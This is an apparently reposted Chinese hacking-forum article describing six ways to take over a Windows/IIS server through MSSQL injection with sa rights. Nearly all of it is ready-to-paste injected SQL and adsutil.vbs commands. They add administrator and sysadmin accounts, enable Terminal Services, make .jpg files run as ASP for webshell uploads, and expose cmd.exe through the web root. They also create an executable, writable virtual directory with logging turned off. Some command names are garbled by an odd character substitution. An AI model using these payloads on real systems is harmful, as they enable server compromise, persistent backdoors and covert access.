| 关键词: 太阳 linzi Adsutil Inetpub AdminSc 方法 master root vbs svc |
文章作者:linzi mssql injection之sa的利用数据库和网站放同一服务器:方法一: 开TS,加账户上去,具体语句如下:;exec master.dbo.xp_cmdshell '@echo [Components] > c:\sql';exec master.dbo.xp_cmdshell '@echo TSEnable = on >> c:\sql';exec master.dbo.xp_cmdshell '@sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q' ;exec master.dbo.xp_cmdshell '@del C:\server'Exec Master..Xp_CmdShell 'net user linzi 123 /add'Exec Master..Xp_CmdShell 'net localgroup administrators linzi /add'方法二:用asp.dll解析jpg格式,然后通过上传点,合法的上传一个asp木马,主要是利用Adsutil.vbs这个脚本来实现。具体语句是:csc太阳pt C:\Inetpub\AdminSc太阳pts\adsutil.vbs ENUM w3svc/3/root 得到其目录csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/3/Root/Sc太阳ptMaps ".jpg,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"方法三:加个system权限的用户,然后用查询分析器连接上去具体语句:;exec master.dbo.sp_addlogin linzi;--;exec master.dbo.sp_password null,linzi,linzi;--;exec master.dbo.sp_addsrvrolemember linzi sysadmin;--方法四:老洞新用.构造原始的U漏洞,然后用小金写的工具连接上去,实现上传具体语句如下:;exec master.dbo.xp_cmdshell'copy c:\winnt\system32\cmd.exe c:\inetpub\sc太阳pts\linzi.exe'方法五:利用Adsutil.vbs建一个有浏览,写,执行等权限的目录,然后实现上传具体语句如下:csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir" csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0 csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/Path "c:\" csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1 csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1 csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1 csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSc太阳pt 1 csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessW太阳te 1 csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/Sc太阳ptMaps ".asp,c:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG" csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1 csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1 csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0然后http://ip/linzi/登上去方法六:暴路径,然后,写入小马,或者上传一张图木马,然后再用copy命令把扩展名改成asp具体语句如下:1.暴目录:;create table [dbo].[linzi] ([daya][char](255));--;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into linzi (daya) values(@result);--and 1=(select top 1 daya from linzi)2.图片改名copy 图片路径+linzi.jpg 图片路径+linzi.asp面的六种方法,可以说是比较有效的六种,当然,对于sa入侵的方法五花八门,我个人是常用上面几种,因为上面的几种方法,对于大部份的网站已经够了,好了,有时间继续写数据库不是放在同一服务器的攻击方法。累啊!~~~详细看我做的几个动画,我个人常用的方法是先开Terminal Service,然后再写入down.vbs,再上传一个端口转发工具,如htran,转发到公网,直接登陆,动画里有。动画下载:http://www.cnbct.org/bbs/dispbbs.asp?boardID=5&ID=52&page=1方法二见讨论的地方 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|